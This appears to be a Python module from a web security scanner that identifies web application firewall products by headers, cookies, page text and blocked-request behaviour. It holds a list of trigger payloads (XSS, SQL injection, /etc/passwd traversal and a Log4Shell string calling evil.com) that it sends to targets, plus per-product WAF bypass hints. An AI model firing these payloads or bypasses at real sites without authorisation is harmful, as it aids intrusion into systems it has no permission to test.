"""
WAF Detection Module — Web Application Firewall identification.

Detects WAF presence and identifies the product via:
response headers, cookies, error page signatures, and
behavioral analysis (blocked request detection).

Loads 100+ WAF signatures from ``data/waf_signatures.json`` and falls
back to the built-in ``WAF_SIGNATURES`` dict if the data file is absent.
"""
import re
import logging
import time

from ._base import (
    create_result,
    add_finding,
    finalize_result,
    load_json_data,
)

logger = logging.getLogger(__name__)

# ── Built-in signatures (legacy fallback) ──────────────────────────────────
WAF_SIGNATURES = {
    'Cloudflare': {
        'headers': {'Server': r'cloudflare', 'CF-RAY': r'.+'},
        'cookies': [r'__cfduid', r'__cf_bm', r'cf_clearance'],
        'body': [r'cloudflare', r'Attention Required!.*Cloudflare'],
    },
    'AWS WAF': {
        'headers': {'X-AMZ-': r'.+', 'x-amzn-RequestId': r'.+'},
        'cookies': [r'awswaf', r'aws-waf-token'],
        'body': [r'aws\.amazon\.com/waf'],
    },
    'Akamai': {
        'headers': {'X-Akamai-': r'.+', 'Server': r'AkamaiGHost'},
        'cookies': [r'akamai', r'ak_bmsc', r'bm_sv'],
        'body': [r'akamai', r'Reference.*#\d+\.\w+'],
    },
    'Imperva/Incapsula': {
        'headers': {'X-CDN': r'Imperva|Incapsula', 'X-Iinfo': r'.+'},
        'cookies': [r'visid_incap', r'incap_ses', r'nlbi_'],
        'body': [r'Incapsula incident', r'_Incapsula_Resource', r'imperva'],
    },
    'Sucuri': {
        'headers': {'Server': r'Sucuri', 'X-Sucuri-ID': r'.+'},
        'cookies': [r'sucuri_cloudproxy'],
        'body': [r'sucuri', r'Access Denied.*Sucuri'],
    },
    'F5 BIG-IP ASM': {
        'headers': {'Server': r'BIG-IP|BigIP', 'X-WA-Info': r'.+'},
        'cookies': [r'TS\w{6,}', r'BIGipServer'],
        'body': [r'The requested URL was rejected'],
    },
    'ModSecurity': {
        'headers': {'Server': r'Mod_Security|NOYB'},
        'cookies': [],
        'body': [r'Mod_Security', r'NOYB', r'This error was generated by Mod_Security'],
    },
    'Barracuda': {
        'headers': {'Server': r'Barracuda'},
        'cookies': [r'barra_counter_session'],
        'body': [r'barracuda', r'Barracuda Web Application Firewall'],
    },
    'Fortinet FortiWeb': {
        'headers': {'Server': r'FortiWeb'},
        'cookies': [r'FORTIWAFSID'],
        'body': [r'fortigate', r'fortiweb', r'FortiGuard'],
    },
    'Citrix NetScaler': {
        'headers': {'Via': r'NS-CACHE', 'Cneonction': r'.+', 'X-NS-': r'.+'},
        'cookies': [r'ns_af', r'citrix_ns_id'],
        'body': [r'ns_af.*\.js', r'NetScaler'],
    },
    'DenyAll': {
        'headers': {},
        'cookies': [r'sessioncookie'],
        'body': [r'Condition Intercepted'],
    },
    'Comodo': {
        'headers': {'Server': r'Protected by COMODO'},
        'cookies': [],
        'body': [r'Protected by COMODO'],
    },
    'Wordfence': {
        'headers': {},
        'cookies': [r'wfvt_', r'wordfence'],
        'body': [r'wordfence', r'This response was generated by Wordfence'],
    },
    'Reblaze': {
        'headers': {'Server': r'Reblaze Secure Web Gateway'},
        'cookies': [r'rbzid'],
        'body': [],
    },
    'AWS Shield': {
        'headers': {'x-amz-apigw-id': r'.+'},
        'cookies': [],
        'body': [],
    },
    # ── Phase 10 additions ──────────────────────────────────────────
    'GCP Cloud Armor': {
        'headers': {'Server': r'Google Frontend', 'Via': r'.*google.*'},
        'cookies': [],
        'body': [r'Google Cloud Armor', r'Error 403.*Forbidden'],
    },
    'Azure WAF': {
        'headers': {'X-Azure-Ref': r'.+', 'X-MS-Request-Id': r'.+'},
        'cookies': [],
        'body': [r'Azure', r'Web Application Firewall'],
    },
    'Alibaba Cloud WAF': {
        'headers': {'Server': r'Tengine', 'X-Server-Guard': r'.+'},
        'cookies': [r'aliyungf'],
        'body': [r'aliyun', r'alibaba'],
    },
    'Edgenext': {
        'headers': {'Server': r'EdgeNext'},
        'cookies': [],
        'body': [r'edgenext'],
    },
    'Radware AppWall': {
        'headers': {'X-SL-CompState': r'.+'},
        'cookies': [],
        'body': [r'Radware', r'AppWall'],
    },
    'SafeDog': {
        'headers': {'Server': r'SafeDog|safedog'},
        'cookies': [r'safedog'],
        'body': [r'SafeDog', r'safedog'],
    },
    'ThreatX': {
        'headers': {'X-ThreatX': r'.+'},
        'cookies': [],
        'body': [r'ThreatX'],
    },
    'Wallarm': {
        'headers': {'Server': r'nginx-wallarm'},
        'cookies': [],
        'body': [r'wallarm'],
    },
    'SonicWall': {
        'headers': {'Server': r'SonicWALL'},
        'cookies': [],
        'body': [r'SonicWALL', r'Web Site Blocked'],
    },
    'StackPath': {
        'headers': {'X-SP-': r'.+'},
        'cookies': [r'sp_waf'],
        'body': [r'StackPath'],
    },
    'Palo Alto': {
        'headers': {},
        'cookies': [],
        'body': [r'has been blocked in accordance with company policy'],
    },
    'Fortiweb': {
        'headers': {'Server': r'FortiWeb'},
        'cookies': [r'FORTIWAFSID'],
        'body': [r'FortiWeb', r'FortiGuard'],
    },
    'Airlock': {
        'headers': {},
        'cookies': [r'AL_SESS', r'AL_LB'],
        'body': [],
    },
    'AppTrana': {
        'headers': {},
        'cookies': [r'ak_bmsc'],
        'body': [r'AppTrana', r'Indusface'],
    },
    'Qrator': {
        'headers': {'X-Qrator-SessionId': r'.+'},
        'cookies': [],
        'body': [r'qrator'],
    },
    'BitNinja': {
        'headers': {'Server': r'BitNinja'},
        'cookies': [],
        'body': [r'BitNinja'],
    },
    'Bekchy': {
        'headers': {},
        'cookies': [],
        'body': [r'Bekchy.*Access Denied'],
    },
    'PowerCDN': {
        'headers': {'X-CDN': r'PowerCDN'},
        'cookies': [],
        'body': [],
    },
    'KeyCDN': {
        'headers': {'Server': r'KeyCDN'},
        'cookies': [],
        'body': [],
    },
}

# Common XSS/SQLi payloads to trigger WAF blocks
WAF_TRIGGER_PAYLOADS = [
    "<script>alert(1)</script>",
    "' OR 1=1 --",
    "../../etc/passwd",
    "${jndi:ldap://evil.com/a}",
]


def _load_waf_json_signatures() -> list:
    """Load WAF signatures from the JSON data file.

    Returns a list of WAF dicts ready for matching, or an empty list
    when the file is absent/broken (then the built-in dict is used).
    """
    data = load_json_data('waf_signatures.json')
    if isinstance(data, dict) and 'wafs' in data:
        return data['wafs']
    return []


def run_waf_detection(target_url: str, make_request_fn=None) -> dict:
    """
    Detect WAF presence and identify the product.

    Args:
        target_url: URL to test
        make_request_fn: Optional function to make HTTP requests
                         Signature: fn(method, url, **kwargs) -> Response

    Returns standardised dict (findings/metadata/errors/stats) **plus**
    legacy keys for backward compatibility:

        detected, products, confidence, evidence, behavioral
    """
    start = time.time()
    result = create_result('waf_detection', target_url)

    # ── Legacy keys ──
    result['detected'] = False
    result['products'] = []
    result['confidence'] = 'none'
    result['evidence'] = []
    result['behavioral'] = {}

    if not make_request_fn:
        return finalize_result(result, start)

    # 1. Passive detection — analyze normal response
    result['stats']['total_checks'] += 1
    try:
        response = make_request_fn('GET', target_url)
    except Exception as exc:
        result['errors'].append(f'Initial request failed: {exc}')
        return finalize_result(result, start)

    if not response:
        result['errors'].append('Empty response from target')
        return finalize_result(result, start)

    result['stats']['successful_checks'] += 1
    headers = dict(response.headers) if response.headers else {}
    body = response.text or ''
    cookies = {}
    if hasattr(response, 'cookies'):
        cookies = {c.name: c.value for c in response.cookies} if response.cookies else {}

    # Try JSON signatures first, fall back to built-in
    json_sigs = _load_waf_json_signatures()
    if json_sigs:
        _match_json_signatures(json_sigs, headers, body, cookies, result)
    else:
        _match_builtin_signatures(headers, body, cookies, result)

    # 2. Behavioral detection — send trigger payloads
    behavioral = _behavioral_detection(target_url, response, make_request_fn)
    result['behavioral'] = behavioral

    if behavioral.get('blocked'):
        result['detected'] = True
        result['evidence'].append(f'Request blocked with status {behavioral.get("block_status")}')

    # 3. Challenge page detection
    body_lower = body.lower()
    challenge_indicators = [
        ('cloudflare_challenge', 'Checking your browser before accessing'),
        ('cloudflare_challenge', 'cf-browser-verification'),
        ('captcha', 'recaptcha'),
        ('captcha', 'hcaptcha'),
        ('js_challenge', 'challenge-platform'),
        ('interstitial', 'please wait'),
        ('ddos_guard', 'DDoS protection by'),
    ]
    for tag, indicator in challenge_indicators:
        if indicator.lower() in body_lower:
            result['detected'] = True
            result['evidence'].append(f'Challenge page detected: {tag}')
            if not any(p['name'] == tag for p in result['products']):
                result['products'].append({
                    'name': tag,
                    'score': 2,
                    'evidence': [f'Body contains: {indicator[:40]}'],
                })
            break

    # 4. Additional status-code based WAF indicators
    status = response.status_code if hasattr(response, 'status_code') else 0
    waf_status_codes = {406, 419, 501}
    if status in waf_status_codes:
        result['detected'] = True
        result['evidence'].append(f'WAF-indicative status code: {status}')

    # Set confidence
    if result['products']:
        max_score = max(p['score'] for p in result['products'])
        result['confidence'] = 'high' if max_score >= 4 else 'medium' if max_score >= 2 else 'low'
    elif behavioral.get('blocked'):
        result['confidence'] = 'medium'

    # Sort products by score
    result['products'].sort(key=lambda x: x['score'], reverse=True)

    # 5. Generate bypass hints for each detected product
    bypass_hint_map = {
        'cloudflare': ['double_url_encode', 'unicode_substitute', 'whitespace_variation'],
        'modsecurity': ['comment_insertion', 'case_toggle', 'null_byte'],
        'akamai': ['double_url_encode', 'chunk_payload', 'parameter_pollution'],
        'imperva': ['unicode_substitute', 'header_smuggle', 'double_url_encode'],
        'aws waf': ['case_toggle', 'whitespace_variation', 'comment_insertion'],
        'f5 big-ip asm': ['null_byte', 'double_url_encode', 'chunk_payload'],
        'sucuri': ['unicode_substitute', 'whitespace_variation', 'case_toggle'],
        'wordfence': ['double_url_encode', 'comment_insertion', 'unicode_substitute'],
    }
    for prod in result['products']:
        prod_lower = prod['name'].lower()
        for key, hints in bypass_hint_map.items():
            if key in prod_lower:
                prod['bypass_hints'] = hints
                break
        else:
            prod['bypass_hints'] = ['double_url_encode', 'unicode_substitute', 'case_toggle']

    # Add findings from products
    for prod in result['products']:
        add_finding(result, {
            'type': 'waf_detected',
            'name': prod['name'],
            'score': prod['score'],
            'evidence': prod['evidence'],
        })

    return finalize_result(result, start)


# ── Matching Engines ───────────────────────────────────────────────────────

def _match_json_signatures(sigs: list, headers: dict, body: str,
                           cookies: dict, result: dict):
    """Match against the rich JSON-format signatures."""
    for waf in sigs:
        score = 0
        evidence = []
        waf_name = waf.get('name', 'Unknown')
        result['stats']['total_checks'] += 1

        # Header checks
        for hdr_name, pattern in (waf.get('headers') or {}).items():
            for resp_hdr, resp_val in headers.items():
                if hdr_name.lower() in resp_hdr.lower():
                    if re.search(pattern, resp_val, re.IGNORECASE):
                        score += 2
                        evidence.append(f'Header {resp_hdr}: {resp_val[:50]}')

        # Cookie checks
        for cookie_name, _flag in (waf.get('cookies') or {}).items():
            for ck in cookies:
                if cookie_name.lower() in ck.lower():
                    score += 2
                    evidence.append(f'Cookie: {ck}')

        # Body checks
        for bp in (waf.get('body_patterns') or []):
            if re.search(re.escape(bp) if not _looks_like_regex(bp) else bp,
                         body, re.IGNORECASE):
                score += 1
                evidence.append(f'Body pattern: {bp[:40]}')

        if score >= 2:
            result['detected'] = True
            result['products'].append({'name': waf_name, 'score': score, 'evidence': evidence})
            result['evidence'].extend(evidence)
            result['stats']['successful_checks'] += 1


def _match_builtin_signatures(headers: dict, body: str, cookies: dict,
                              result: dict):
    """Match against the built-in WAF_SIGNATURES dict (legacy path)."""
    for waf_name, signature in WAF_SIGNATURES.items():
        score = 0
        evidence = []
        result['stats']['total_checks'] += 1

        # Header checks
        for header_name, pattern in signature.get('headers', {}).items():
            for resp_header, resp_value in headers.items():
                if header_name.lower() in resp_header.lower():
                    if re.search(pattern, resp_value, re.IGNORECASE):
                        score += 2
                        evidence.append(f'Header {resp_header}: {resp_value[:50]}')

        # Cookie checks
        for cookie_pattern in signature.get('cookies', []):
            for cookie_name in cookies:
                if re.search(cookie_pattern, cookie_name, re.IGNORECASE):
                    score += 2
                    evidence.append(f'Cookie: {cookie_name}')

        # Body checks
        for body_pattern in signature.get('body', []):
            if re.search(body_pattern, body, re.IGNORECASE):
                score += 1
                evidence.append(f'Body pattern: {body_pattern[:40]}')

        if score >= 2:
            result['detected'] = True
            result['products'].append({
                'name': waf_name,
                'score': score,
                'evidence': evidence,
            })
            result['evidence'].extend(evidence)
            result['stats']['successful_checks'] += 1


def _looks_like_regex(s: str) -> bool:
    """Heuristic: does the string contain regex metacharacters?"""
    return bool(re.search(r'[\\.*+?^${}()|[\]]', s))


def _behavioral_detection(target_url: str, normal_response, make_request_fn) -> dict:
    """Detect WAF by sending suspicious payloads and comparing responses."""
    normal_time = 0.0
    try:
        if hasattr(normal_response, 'elapsed') and normal_response.elapsed:
            normal_time = float(normal_response.elapsed.total_seconds())
    except (TypeError, AttributeError):
        normal_time = 0.0

    result = {
        'blocked': False,
        'block_status': None,
        'block_reason': None,
        'normal_status': normal_response.status_code if normal_response else None,
        'timing_anomaly': False,
    }

    separator = '&' if '?' in target_url else '?'

    for payload in WAF_TRIGGER_PAYLOADS[:2]:
        test_url = f'{target_url}{separator}test={payload}'

        req_start = time.time()
        try:
            response = make_request_fn('GET', test_url)
        except Exception:
            continue
        req_elapsed = time.time() - req_start

        if not response:
            continue

        # Timing analysis: WAF-blocked responses often return faster
        try:
            if normal_time > 0.1 and req_elapsed < normal_time * 0.3:
                result['timing_anomaly'] = True
        except TypeError:
            pass

        # Check for WAF block indicators
        if response.status_code in (403, 406, 419, 429, 501, 503):
            body_lower = response.text.lower() if response.text else ''

            block_indicators = [
                'blocked', 'denied', 'forbidden', 'not acceptable',
                'request rejected', 'access denied', 'security policy',
                'waf', 'firewall', 'protection', 'rate limit',
            ]

            if any(ind in body_lower for ind in block_indicators):
                result['blocked'] = True
                result['block_status'] = response.status_code
                result['block_reason'] = f'Payload "{payload[:30]}" blocked'
                break

        # Compare response code with normal response
        if normal_response and response.status_code != normal_response.status_code:
            if response.status_code in (403, 406, 419, 429, 501, 503):
                result['blocked'] = True
                result['block_status'] = response.status_code
                result['block_reason'] = f'Status changed from {normal_response.status_code} to {response.status_code}'
                break

    return result
